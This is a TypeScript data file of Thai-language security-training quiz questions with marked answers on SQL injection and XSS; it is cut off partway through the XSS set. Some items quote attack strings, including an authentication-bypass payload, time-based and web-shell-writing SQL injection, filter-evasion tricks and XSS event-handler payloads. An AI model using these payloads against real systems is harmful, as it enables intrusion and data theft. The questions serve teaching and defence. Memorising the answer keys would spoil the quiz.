import { QuizQuestion } from '@/types';

export const intermediateQuizzesData: Record<string, Omit<QuizQuestion, 'id' | 'quizId'>[]> = {
  // ==================== LEVEL 2: INTERMEDIATE ====================
  // 1. SQL Injection & Database Exploits
  'lesson-i1-1': [
    {
      question: 'ข้อใดคือสาเหตุหลักของการเกิดช่องโหว่ SQL Injection (SQLi)?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การนำ Input จากผู้ใช้ไปต่อสตริง (String Concatenation) เข้ากับคำสั่ง SQL โดยตรงโดยไม่มีการ Parameterize หรือ Escaping' },
        { key: 'B', text: 'การใช้ฐานข้อมูลแบบ Relational แทน NoSQL' },
        { key: 'C', text: 'การตั้งชื่อตารางฐานข้อมูลเป็นภาษาอังกฤษ' },
        { key: 'D', text: 'การเปิดใช้งานฟังก์ชัน Primary Key' },
      ],
      correctAnswer: 'A',
      explanation: 'SQL Injection เกิดจากการผสมข้อมูลที่ผู้ใช้ป้อนเข้ากับโครงสร้างคำสั่ง SQL ทำให้ผู้โจมตีสามารถเปลี่ยนไวยากรณ์และเจตนาของคำสั่ง Query ได้',
      order: 1,
    },
    {
      question: 'เทคนิคการป้องกัน SQL Injection ที่ได้รับการยอมรับว่าเป็น Best Practice และมีประสิทธิภาพสูงสุดคือข้อใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Parameterized Queries / Prepared Statements (เช่น ใน PDO, JDBC, ORM)' },
        { key: 'B', text: 'การแปลงตัวอักษรเป็นพิมพ์ใหญ่ทั้งหมด' },
        { key: 'C', text: 'การใช้คำสั่ง LIMIT 1 เสมอ' },
        { key: 'D', text: 'การซ่อนชื่อฐานข้อมูลไม่ให้ใครรู้' },
      ],
      correctAnswer: 'A',
      explanation: 'Prepared Statements แยกข้อมูล (Data) ออกจากคำสั่ง (Code) อย่างเด็ดขาด ทำให้ฐานข้อมูลมองค่าที่ส่งเข้ามาเป็นเพียงตัวแปรเสมอ ไม่ถูกคอมไพล์เป็นคำสั่ง',
      order: 2,
    },
    {
      question: "การโจมตีแบบ ' OR '1'='1 ในฟอร์มล็อกอินมีเป้าหมายเพื่ออะไร?",
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ทำให้เงื่อนไข WHERE ใน SQL เป็นจริงเสมอ (True) ส่งผลให้ข้ามการตรวจสอบรหัสผ่าน (Authentication Bypass)' },
        { key: 'B', text: 'สร้างตารางใหม่ในฐานข้อมูล' },
        { key: 'C', text: 'ปิดการทำงานของเว็บเบราว์เซอร์' },
        { key: 'D', text: 'ลบไฟล์รูปภาพในเซิร์ฟเวอร์' },
      ],
      correctAnswer: 'A',
      explanation: "เงื่อนไข OR 1=1 ทำให้ประโยค Query SELECT * FROM users WHERE username='' OR '1'='1 ส่งคืนแถวข้อมูลแรก (มักเป็น admin) ทำให้บายพาสล็อกอินได้",
      order: 3,
    },
    {
      question: 'การโจมตี "UNION-Based SQL Injection" มีเงื่อนไขสำคัญอย่างไรในการดึงข้อมูลจากตารางอื่น?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'จำนวนคอลัมน์และประเภทข้อมูล (Data Types) ของคำสั่งย่อยต้องตรงกับคำสั่ง SELECT ชุดแรก' },
        { key: 'B', text: 'ต้องใช้เฉพาะกับฐานข้อมูล Oracle เท่านั้น' },
        { key: 'C', text: 'ต้องทำผ่านโปรโตคอล Telnet เท่านั้น' },
        { key: 'D', text: 'ไม่จำเป็นต้องมีเงื่อนไขใดๆ' },
      ],
      correctAnswer: 'A',
      explanation: 'โอเปอเรเตอร์ UNION รวมผลลัพธ์จาก 2 queries เข้าด้วยกัน จึงบังคับให้ทั้งสองชุดต้องมีจำนวนคอลัมน์เท่ากันและมี Data Type ที่เข้ากันได้',
      order: 4,
    },
    {
      question: 'เทคนิค "Blind SQL Injection" (เช่น Boolean-based หรือ Time-based) ถูกนำมาใช้ในสถานการณ์ใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เมื่อเว็บแอปพลิเคชันไม่มีการแสดงผลลัพธ์ของข้อมูลหรือ Error Message ของ SQL ออกมาบนหน้าจอโดยตรง' },
        { key: 'B', text: 'เมื่อฐานข้อมูลปิดการใช้งานระบบสำรองไฟ' },
        { key: 'C', text: 'เมื่อผู้โจมตีไม่ทราบ IP Address ของเซิร์ฟเวอร์' },
        { key: 'D', text: 'เมื่อเว็บไซต์ใช้การเชื่อมต่อผ่าน Bluetooth' },
      ],
      correctAnswer: 'A',
      explanation: 'Blind SQLi อาศัยการอนุมานข้อมูลทีละตัวอักษรผ่านการสังเกตการตอบสนองแบบ จริง/เท็จ หรือการหน่วงเวลาการตอบสนอง (Time Delay เช่น SLEEP(5))',
      order: 5,
    },
    {
      question: 'คำสั่ง SQL Injection ชนิด Time-based บน MySQL มักใช้ฟังก์ชันใดในการทดสอบ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: `' AND (SELECT SLEEP(5)) --` },
        { key: 'B', text: `' AND 1=1 --` },
        { key: 'C', text: `' DROP DATABASE --` },
        { key: 'D', text: `' UNION SELECT 1,2 --` },
      ],
      correctAnswer: 'A',
      explanation: 'ฟังก์ชัน SLEEP(5) หรือ pg_sleep(5) บน Postgres สั่งให้ฐานข้อมูลหยุดรอตามเวลาที่กำหนด หากหน้าเว็บโหลดช้าลง 5 วินาทีจริง ยืนยันว่ามีช่องโหว่ SQLi',
      order: 6,
    },
    {
      question: 'ในฐานข้อมูล MySQL และ PostgreSQL ตารางสารบบระบบที่เก็บรายชื่อตารางและคอลัมน์ทั้งหมดมีชื่อว่าอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'information_schema.tables และ information_schema.columns' },
        { key: 'B', text: 'sys.all_data' },
        { key: 'C', text: 'master.dbo.tables' },
        { key: 'D', text: 'config.schema.all' },
      ],
      correctAnswer: 'A',
      explanation: 'information_schema เป็น Schema มาตรฐานสากลที่ผู้โจมตีมัก Query หาโครงสร้างฐานข้อมูลเพื่อขโมยข้อมูลสำคัญต่อไป',
      order: 7,
    },
    {
      question: 'เครื่องมืออัตโนมัติยอดนิยมที่ใช้ในการตรวจจับและหาผลประโยชน์จากช่องโหว่ SQL Injection คือเครื่องมือใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'sqlmap' },
        { key: 'B', text: 'Wireshark' },
        { key: 'C', text: 'Nmap' },
        { key: 'D', text: 'Aircrack-ng' },
      ],
      correctAnswer: 'A',
      explanation: 'sqlmap เป็นเครื่องมือ Open Source ที่ทรงพลังสำหรับการทดสอบและดึงข้อมูลจากช่องโหว่ SQL Injection อัตโนมัติ',
      order: 8,
    },
    {
      question: 'การตั้งค่าสิทธิ์ของ Database User แบบ Least Privilege ช่วยบรรเทาความเสียหายจาก SQL Injection ได้อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'จำกัดไม่ให้ DB User รันคำสั่งระดับสูง เช่น DROP TABLE, GRANT หรืออ่าน/เขียนไฟล์บน OS (เช่น INTO OUTFILE)' },
        { key: 'B', text: 'ป้องกันไม่ให้มีคนเข้าชมเว็บไซต์เกิน 100 คน' },
        { key: 'C', text: 'ทำให้ฐานข้อมูลบันทึกข้อมูลได้เร็วขึ้น' },
        { key: 'D', text: 'ทำให้ไม่ต้องใช้รหัสผ่านในการเชื่อมต่อ' },
      ],
      correctAnswer: 'A',
      explanation: 'การไม่ใช้ user root/dba เชื่อมต่อเว็บแอพ และตัดสิทธิ์ FILE/SUPER privilege ช่วยลดความรุนแรงไม่ให้เกิด RCE หรือการทำลายระบบ',
      order: 9,
    },
    {
      question: 'ฟังก์ชัน `pg_read_file()` หรือ `LOAD_FILE()` ใน SQL Injection สามารถถูกผู้โจมตีนำไปใช้ทำอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'อ่านไฟล์ระบบในเครื่องโฮสต์ (เช่น /etc/passwd หรือ source code configuration files)' },
        { key: 'B', text: 'เปิดดูภาพยนตร์ในเครื่องเซิร์ฟเวอร์' },
        { key: 'C', text: 'ดาวน์โหลดเพลง mp3' },
        { key: 'D', text: 'ลบระบบปฏิบัติการทิ้ง' },
      ],
      correctAnswer: 'A',
      explanation: 'หาก DB User มีสิทธิ์อ่านไฟล์ระบบ ฟังก์ชันเหล่านี้จะช่วยให้แฮกเกอร์อ่านไฟล์ Secrets และ Config บนเซิร์ฟเวอร์ได้โดยตรง',
      order: 10,
    },
    {
      question: 'ช่องโหว่ "Second-Order SQL Injection" มีลักษณะการทำงานอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Payload ถูกบันทึกลงในฐานข้อมูลอย่างปลอดภัยในขั้นแรก แต่ถูกดึงไปใช้สร้างคำสั่ง SQL ที่มีช่องโหว่ในภายหลังโดยส่วนอื่นของระบบ' },
        { key: 'B', text: 'การโจมตีฐานข้อมูลพร้อมกันสองเครื่อง' },
        { key: 'C', text: 'การส่งคำขอด้วยเวลาห่างกัน 2 วินาที' },
        { key: 'D', text: 'การใช้รหัสผ่านสองชุด' },
      ],
      correctAnswer: 'A',
      explanation: 'Second-Order SQLi เกิดขึ้นเมื่อระบบเชื่อใจข้อมูลที่เก็บอยู่ใน DB แล้วดึงมาต่อสตริง SQL โดยไม่ระวังในกระบวนการถัดไป (เช่น หน้า Admin Profile)',
      order: 11,
    },
    {
      question: 'เหตุใดการใช้ "Blacklist Filtering" (ตัดคำว่า SELECT, UNION ทิ้ง) จึงไม่เพียงพอในการป้องกัน SQL Injection?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ผู้โจมตีสามารถเลี่ยงการตรวจจับได้หลายวิธี เช่น การสลับตัวพิมพ์เล็ก-ใหญ่ (uNiOn), การแทรกคอมเมนต์ (UN/**/ION), หรือการใช้ Double Encoding' },
        { key: 'B', text: 'เพราะระบบ Blacklist ใช้พื้นที่ฮาร์ดดิสก์มากเกินไป' },
        { key: 'C', text: 'เพราะ Blacklist บังคับให้ใช้ภาษาไทยเท่านั้น' },
        { key: 'D', text: 'เพราะทำให้เครื่องเซิร์ฟเวอร์ดับทันที' },
      ],
      correctAnswer: 'A',
      explanation: 'Blacklist มักมีช่องโหว่ให้บายพาสได้เสมอ การใช้ Prepared Statements และ Whitelist จึงเป็นวิธีที่ถูกต้องและปลอดภัยแท้จริง',
      order: 12,
    },
    {
      question: 'ข้อใดคือตัวอย่างโค้ดที่ปลอดภัยจาก SQL Injection ในภาษา Node.js (PostgreSQL/pg)?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: `db.query('SELECT * FROM users WHERE id = $1', [userId])` },
        { key: 'B', text: `db.query('SELECT * FROM users WHERE id = ' + userId)` },
        { key: 'C', text: `db.query(\`SELECT * FROM users WHERE id = \${userId}\`)` },
        { key: 'D', text: `eval('SELECT * FROM users WHERE id = ' + userId)` },
      ],
      correctAnswer: 'A',
      explanation: 'การใช้ `$1` พร้อมส่งพารามิเตอร์ใน Array `[userId]` เป็น Parameterized Query ที่ฐานข้อมูลจะประมวลผลอย่างปลอดภัย',
      order: 13,
    },
    {
      question: 'การโจมตีแบบ "Error-Based SQL Injection" อาศัยอะไรในการขโมยข้อมูล?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การจงใจทำให้ฐานข้อมูลเกิด Error แล้วบังคับให้ฐานข้อมูลแสดงผลลัพธ์ของข้อมูลสำคัญออกมาในข้อความ Error Message' },
        { key: 'B', text: 'การส่งคำขอจนเซิร์ฟเวอร์ดับ' },
        { key: 'C', text: 'การลบโค้ดของเว็บไซต์ทิ้ง' },
        { key: 'D', text: 'การสุ่มรหัสผ่านจนติดข้อผิดพลาด' },
      ],
      correctAnswer: 'A',
      explanation: 'Error-based (เช่น ใช้ CAST, EXTRACTVALUE, updatexml) บังคับให้ DB แปลงผลลัพธ์เป็นข้อความ Error และพ่นออกมาที่หน้าเว็บ',
      order: 14,
    },
    {
      question: 'การโจมตี "Out-of-Band (OOB) SQL Injection" คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การสั่งให้ฐานข้อมูลส่งข้อมูลออกมาผ่านช่องทางโปรโตคอลอื่น เช่น ส่ง DNS Query หรือ HTTP Request ออกไปยังเซิร์ฟเวอร์ของผู้โจมตี' },
        { key: 'B', text: 'การโจมตีผ่านบลูทูธ' },
        { key: 'C', text: 'การถอดปลั๊กเซิร์ฟเวอร์' },
        { key: 'D', text: 'การส่งจดหมายไปที่สำนักงาน' },
      ],
      correctAnswer: 'A',
      explanation: 'OOB SQLi มีประโยชน์มากเมื่อ In-band และ Blind แบบธรรมดาถูกจำกัด โดยสั่งให้ DB ทำ DNS Lookup ข้อมูลลับออกมาหา Domain ของผู้โจมตี',
      order: 15,
    },
    {
      question: 'ในการเขียนโค้ด SQL ข้อใดคือผลกระทบของการปิดฟังก์ชัน "Detailed Error Messages" (ข้อความแสดงข้อผิดพลาดแบบละเอียด) ใน Production?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ช่วยลดการรั่วไหลของข้อมูลโครงสร้างระบบ (Information Disclosure) และสกัดกั้นเทคนิค Error-Based SQLi' },
        { key: 'B', text: 'ทำให้โปรแกรมไม่สามารถบันทึกข้อมูลได้' },
        { key: 'C', text: 'ทำให้หน้าเว็บโหลดช้าลง' },
        { key: 'D', text: 'ทำให้ผู้ใช้ไม่สามารถล็อกอินได้' },
      ],
      correctAnswer: 'A',
      explanation: 'Production ไม่ควรแสดง Stack Trace หรือ Database Syntax Error ออกมาหน้าบ้าน เพื่อไม่ให้เป็นเบาะแสแก่ผู้โจมตี',
      order: 16,
    },
    {
      question: 'คำสั่ง `INTO OUTFILE \'/var/www/html/shell.php\'` ใน MySQL SQL Injection มีจุดประสงค์เพื่ออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เขียนโค้ด Web Shell ลงบนเว็บเซิร์ฟเวอร์เพื่อยึดครองระบบและทำ Remote Code Execution (RCE)' },
        { key: 'B', text: 'ดาวน์โหลดฐานข้อมูลลงเครื่องผู้ใช้' },
        { key: 'C', text: 'ล้างแคชของฐานข้อมูล' },
        { key: 'D', text: 'เปลี่ยนรหัสผ่าน Wi-Fi' },
      ],
      correctAnswer: 'A',
      explanation: 'หากสิทธิ์ DB อนุญาตและรู้ Web Path ผู้โจมตีสามารถเขียนไฟล์ PHP Webshell ลงไดเรกทอรีเว็บเพื่อรันคำสั่ง OS Command ได้',
      order: 17,
    },
    {
      question: 'ช่องโหว่ "NoSQL Injection" เกิดขึ้นกับฐานข้อมูลประเภทใด และมีลักษณะคล้ายกันอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เกิดขึ้นกับ MongoDB/CouchDB โดยผู้โจมตีส่ง Object Operators เช่น `{"$gt": ""}` หรือ `{"$ne": null}` เพื่อบายพาสเงื่อนไข' },
        { key: 'B', text: 'เกิดขึ้นเฉพาะกับไฟล์ Excel' },
        { key: 'C', text: 'เกิดขึ้นเฉพาะบนระบบ iOS' },
        { key: 'D', text: 'ไม่มีอยู่จริง เป็นเพียงทฤษฎี' },
      ],
      correctAnswer: 'A',
      explanation: 'NoSQL DB ก็มีช่องโหว่ Injection ได้หากส่ง JSON Object ที่มีคำสั่ง Operator ($ne, $gt, $regex) เข้าไปในฟังก์ชันค้นหาโดยไม่ตรวจสอบ Type',
      order: 18,
    },
    {
      question: 'การใช้ ORM (Object-Relational Mapping เช่น Prisma, Hibernate, Entity Framework) มีความเสี่ยงต่อ SQL Injection หรือไม่?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ปลอดภัยเป็นส่วนใหญ่ แต่ยังคงเสี่ยงได้หากผู้พัฒนาใช้ Raw Query หรือ String Concatenation ภายใน ORM Method' },
        { key: 'B', text: 'ไม่ปลอดภัยเลย 100%' },
        { key: 'C', text: 'ปลอดภัยสมบูรณ์ 100% ในทุกกรณีไม่ว่าจะเขียนแบบใด' },
        { key: 'D', text: 'ORM ใช้ไม่ได้กับเว็บแอปพลิเคชัน' },
      ],
      correctAnswer: 'A',
      explanation: 'ORM ส่วนใหญ่ใช้ Parameterized Queries ให้อัตโนมัติ แต่หากนักพัฒนาเผลอใช้ `prisma.$queryRawUnsafe` หรือ `sequelize.query` ต่อสตริง ก็ยังโดน SQLi ได้',
      order: 19,
    },
    {
      question: 'มาตรการใดช่วยเสริมความปลอดภัยเพิ่มเติมในการตรวจจับการโจมตี SQL Injection ก่อนที่แพ็กเกจจะถึงเว็บเซิร์ฟเวอร์?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Web Application Firewall (WAF) เช่น Cloudflare WAF, AWS WAF หรือ ModSecurity' },
        { key: 'B', text: 'การเพิ่มความยาวสาย LAN' },
        { key: 'C', text: 'การปิดพัดลมระบายความร้อน' },
        { key: 'D', text: 'การเปลี่ยนสีตัวอักษรในโค้ด' },
      ],
      correctAnswer: 'A',
      explanation: 'WAF ช่วยตรวจสอบ HTTP Request Payload และบล็อก Signature รูปแบบ SQLi ที่เป็นอันตรายก่อนที่จะถูกส่งไปประมวลผลที่ Backend',
      order: 20,
    },
  ],

  // 2. Cross-Site Scripting (XSS) & Defenses
  'lesson-i1-2': [
    {
      question: 'ช่องโหว่ Cross-Site Scripting (XSS) คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ช่องโหว่ที่เปิดโอกาสให้ผู้โจมตีสามารถฝังโค้ดสคริปต์อันตราย (มักเป็น JavaScript) ให้ไปทำงานบนเบราว์เซอร์ของเหยื่อ' },
        { key: 'B', text: 'การลบฐานข้อมูลจากทางไกล' },
        { key: 'C', text: 'การตัดสัญญาณอินเทอร์เน็ตของเครื่องเซิร์ฟเวอร์' },
        { key: 'D', text: 'การระเบิดฮาร์ดแวร์คอมพิวเตอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'XSS ทำให้โค้ด JS ของแฮกเกอร์ถูกรันในบริบทของเหยื่อ ส่งผลให้สามารถขโมย Session, ปลอมแปลงการคลิก หรือนำเหยื่อไปเว็บอันตรายได้',
      order: 1,
    },
    {
      question: 'ข้อใดอธิบายความแตกต่างของ "Stored XSS (Persistent)" ได้ถูกต้องที่สุด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Payload อันตรายถูกบันทึกถาวรลงในฐานข้อมูล (เช่น ในช่องความคิดเห็น) และจะทำงานทุกครั้งที่มีผู้ใช้เปิดดูหน้านั้น' },
        { key: 'B', text: 'Payload ฝังอยู่ใน URL และทำงานเฉพาะเมื่อเหยื่อคลิกลิงก์นั้นเท่านั้น' },
        { key: 'C', text: 'Payload ทำงานเฉพาะในหน่วยความจำ RAM ของเครื่องผู้โจมตี' },
        { key: 'D', text: 'Payload ทำงานเฉพาะตอนที่เซิร์ฟเวอร์ถูกปิด' },
      ],
      correctAnswer: 'A',
      explanation: 'Stored XSS มีความรุนแรงสูงที่สุดในกลุ่ม XSS เพราะโค้ดถูกเก็บในฐานข้อมูลจริง ทำให้เหยื่อทุกคนที่เปิดหน้านั้นถูกโจมตีโดยอัตโนมัติ',
      order: 2,
    },
    {
      question: 'ช่องโหว่ "Reflected XSS" มีพฤติกรรมการแพร่ระบาดอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ผู้โจมตีต้องหลอกล่อให้เหยื่อคลิกลิงก์ที่มีสคริปต์แฝงใน Parameter แล้วเซิร์ฟเวอร์สะท้อนข้อความนั้นกลับมาแสดงบนหน้าเว็บทันที' },
        { key: 'B', text: 'สคริปต์จะแพร่ระบาดผ่านสายแลนไปยังเครื่องข้างๆ อัตโนมัติ' },
        { key: 'C', text: 'สคริปต์จะถูกบันทึกลงในฐานข้อมูลอย่างถาวร' },
        { key: 'D', text: 'สคริปต์จะส่งอีเมลหาเพื่อนทุกคนในสมุดโทรศัพท์' },
      ],
      correctAnswer: 'A',
      explanation: 'Reflected XSS เกิดจากการสะท้อน Input ใน Request (เช่น คำค้นหา ?q=) ออกมาบน Response ทันทีโดยไม่มีการกรอง',
      order: 3,
    },
    {
      question: 'ช่องโหว่ "DOM-based XSS" มีความแตกต่างจาก Stored และ Reflected XSS อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Payload ถูกประมวลผลและรันโดย JavaScript ฝั่ง Client ทั้งหมด (เช่น ผ่าน `document.location` ไปยัง `innerHTML`) โดย Payload อาจไม่ถูกส่งไปถึง Server เลย' },
        { key: 'B', text: 'DOM XSS เกิดขึ้นเฉพาะบนเว็บเซิร์ฟเวอร์ Linux' },
        { key: 'C', text: 'DOM XSS จำเป็นต้องใช้ฐานข้อมูล SQL' },
        { key: 'D', text: 'DOM XSS ไม่สามารถขโมยข้อมูลใดๆ ได้' },
      ],
      correctAnswer: 'A',
      explanation: 'DOM-based XSS เกิดจากโค้ด JS ฝั่งไคลเอนต์นำข้อมูลจาก Source (เช่น location.hash) ไปส่งต่อให้ Sink (เช่น innerHTML/eval) โดยตรง',
      order: 4,
    },
    {
      question: 'ฟังก์ชันหรือพร็อพเพอร์ตี้ JavaScript ข้อใดจัดเป็น Dangerous Sink ที่เสี่ยงต่อการเกิด DOM XSS มากที่สุด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`element.innerHTML`, `document.write()`, และ `eval()`' },
        { key: 'B', text: '`element.textContent` และ `element.innerText`' },
        { key: 'C', text: '`console.log()`' },
        { key: 'D', text: '`Math.floor()`' },
      ],
      correctAnswer: 'A',
      explanation: 'innerHTML และ document.write จะตีความสตริงที่ส่งเข้าไปเป็น HTML แท็กและสคริปต์ จึงเปิดช่องให้ XSS รันได้ทันที',
      order: 5,
    },
    {
      question: 'แนวทางการแสดงผลข้อความอย่างปลอดภัยบน DOM เพื่อป้องกัน XSS ใน JavaScript บริสุทธิ์คือข้อใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ใช้ `element.textContent` หรือ `element.innerText` แทน `element.innerHTML`' },
        { key: 'B', text: 'ใช้ `eval()` ครอบตัวแปรทั้งหมด' },
        { key: 'C', text: 'ใช้ `document.write()`' },
        { key: 'D', text: 'แปลงข้อความเป็นตัวเลขเสมอ' },
      ],
      correctAnswer: 'A',
      explanation: 'textContent ปฏิบัติต่อข้อมูลเป็นเพียงข้อความธรรมดา (Raw String) เสมอ และจะไม่เรนเดอร์แท็ก HTML หรือสคริปต์ใดๆ',
      order: 6,
    },
    {
      question: 'เทคนิค "Context-Aware Output Encoding / Escaping" มีหลักการอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'แปลงตัวอักษรพิเศษ (เช่น `<` เป็น `&lt;`, `>` เป็น `&gt;`, `"` เป็น `&quot;`) ให้สอดคล้องกับตำแหน่งที่แสดงผล (HTML Body, Attribute, JS Context)' },
        { key: 'B', text: 'แปลงตัวอักษรทั้งหมดเป็น Base64 แล้วไม่ถอดรหัส' },
        { key: 'C', text: 'ลบตัวอักษรภาษาอังกฤษออกทั้งหมด' },
        { key: 'D', text: 'เปลี่ยนสีพื้นหลังของข้อความ' },
      ],
      correctAnswer: 'A',
      explanation: 'Output Encoding ป้องกันไม่ให้เบราว์เซอร์สับสนระหว่างตัวอักษรของข้อมูลกับไวยากรณ์คำสั่งของ HTML/JS',
      order: 7,
    },
    {
      question: 'ไลบรารี JavaScript ยอดนิยมที่ใช้สำหรับทำ HTML Sanitization เพื่อล้างสคริปต์อันตรายออกก่อนแสดงผลคืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'DOMPurify' },
        { key: 'B', text: 'jQuery' },
        { key: 'C', text: 'Lodash' },
        { key: 'D', text: 'Axios' },
      ],
      correctAnswer: 'A',
      explanation: 'DOMPurify เป็น Sanitizer library มาตรฐานที่ช่วยกรองและตัดเฉพาะแท็กและแอตทริบิวต์ที่เป็นอันตราย (เช่น <script>, onerror) ออกอย่างหมดจด',
      order: 8,
    },
    {
      question: 'คำสั่ง CSP (Content Security Policy) ข้อใดที่ช่วยป้องกัน XSS ได้อย่างเข้มงวดที่สุด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: `default-src 'self'; script-src 'self' 'nonce-rAnd0m123'; object-src 'none';` },
        { key: 'B', text: `script-src * 'unsafe-inline' 'unsafe-eval';` },
        { key: 'C', text: `default-src *;` },
        { key: 'D', text: `script-src data:;` },
      ],
      correctAnswer: 'A',
      explanation: 'การใช้ Nonce-based CSP และปิด object-src บังคับให้เบราว์เซอร์รันเฉพาะสคริปต์ที่มี Nonce ถูกต้องเท่านั้น และบล็อก Inline Script ของผู้โจมตี',
      order: 9,
    },
    {
      question: 'ใน React / Next.js พร็อพเพอร์ตี้ใดที่หากใช้งานอย่างไม่ระมัดระวังจะเปิดช่องโหว่ XSS ขึ้นในเว็บแอปพลิเคชัน?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`dangerouslySetInnerHTML`' },
        { key: 'B', text: '`className`' },
        { key: 'C', text: '`onClick`' },
        { key: 'D', text: '`useState`' },
      ],
      correctAnswer: 'A',
      explanation: 'React เข้ารหัส HTML ให้อัตโนมัติเป็นค่าเริ่มต้น แต่หากใช้ dangerouslySetInnerHTML จะเป็นการบายพาสระบบป้องกันและเรนเดอร์ Raw HTML ตรงๆ',
      order: 10,
    },
    {
      question: 'Payload XSS เช่น `<img src="x" onerror="alert(document.domain)">` อาศัยพฤติกรรมใดของเบราว์เซอร์ในการรันโค้ด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เมื่อรูปภาพโหลดล้มเหลว (src="x") อีเวนต์ handler `onerror` จะถูกเรียกทำงานและประมวลผลโค้ด JavaScript ทันที' },
        { key: 'B', text: 'เบราว์เซอร์จะดาวน์โหลดรูปภาพมาเก็บในเครื่อง' },
        { key: 'C', text: 'เบราว์เซอร์จะรีสตาร์ทเครื่อง' },
        { key: 'D', text: 'เบราว์เซอร์จะลบประวัติการค้นหา' },
      ],
      correctAnswer: 'A',
      explanation: 'ผู้โจมตีมักใช้อีเวนต์ของแท็กสื่อ (เช่น <img onerror>, <svg onload>) เพื่อเลี่ยงการตรวจจับฟิลเตอร์ที่ดักเฉพาะแท็ก <script>',
      order: 11,
    },
    {
      question: 'การกำหนด Flag `HttpOnly` บนคุกกี้ช่วยลดความเสี่ยงจาก XSS ในแง่มุมใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ป้องกันไม่ให้ผู้โจมตีใช้สคริปต์ XSS สั่ง `document.cookie` เพื่อขโมย Session ID ได้โดยตรง' },
        { key: 'B', text: 'ป้องกันการเกิดบั๊กในโค้ด React' },
        { key: 'C', text: 'ทำให้ไม่สามารถส่งคำขอ HTTP ได้' },
        { key: 'D', text: 'ป้องกันไม่ให้หน้าเว็บแสดงผลผิดเพี้ยน' },
      ],
      correctAnswer: 'A',
      explanation: 'แม้เว็บจะมีช่องโหว่ XSS แต่ถ้าคุกกี้มี Flag HttpOnly สคริปต์ของผู้โจมตีจะไม่สามารถอ่าน Session Token ออกไปได้',
      order: 12,
    },
    {
      question: 'ช่องโหว่ "mXSS" (Mutation XSS) เกิดจากสาเหตุใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เบราว์เซอร์ทำการ Re-parse หรือปรับโครงสร้าง DOM อัตโนมัติจนทำให้ข้อความที่ดูปลอดภัยกลายสภาพเป็นโค้ดสคริปต์ที่ทำงานได้' },
        { key: 'B', text: 'การกลายพันธุ์ของเชื้อไวรัสในอากาศ' },
        { key: 'C', text: 'การเสื่อมสภาพของฮาร์ดดิสก์' },
        { key: 'D', text: 'การเปลี่ยนภาษาของระบบปฏิบัติการ' },
      ],
      correctAnswer: 'A',
      explanation: 'mXSS เกิดขึ้นเมื่อ HTML Parser ของ Browser จัดระเบียบแท็กใหม่จนเปิดช่องให้ Payload ที่หลบตัวกรองเรนเดอร์ขึ้นมาทำงาน',
      order: 13,
    },
    {
      question: 'การใส่ลิงก์ที่ผู้ใช้กำหนดลงในแท็ก `<a href="...">` มีความเสี่ยง XSS หากผู้ใช้ป้อน URI Scheme ใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`javascript:alert(1)` หรือ `data:text/html,...`' },
        { key: 'B', text: '`https://`' },
        { key: 'C', text: '`http://`' },
        { key: 'D', text: '`mailto:`' },
      ],
      correctAnswer: 'A',
      explanation: 'หากไม่ตรวจสอบ Scheme และยอมรับ `javascript:` เมื่อเหยื่อคลิกลิงก์ เบราว์เซอร์จะรันโค้ด JavaScript ที่ระบุไว้ทันที',
      order: 14,
    },
    {
      question: 'การใช้ Template Engine (เช่น EJS, Handlebars, Jinja) เพื่อป้องกัน XSS ควรเลือกใช้ไวยากรณ์แบบใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ไวยากรณ์ที่มีการ Auto-escaping เสมอ (เช่น `<%= data %>` หรือ `{{ data }}`) และหลีกเลี่ยง Raw Unescaped tags (เช่น `<%- %>` หรือ `{{{ }}}`)' },
        { key: 'B', text: 'ไวยากรณ์ Raw output ทั้งหมด' },
        { key: 'C', text: 'ห้ามใช้ Template Engine เด็ดขาด' },
        { key: 'D', text: 'ใช้เฉพาะไฟล์ .txt' },
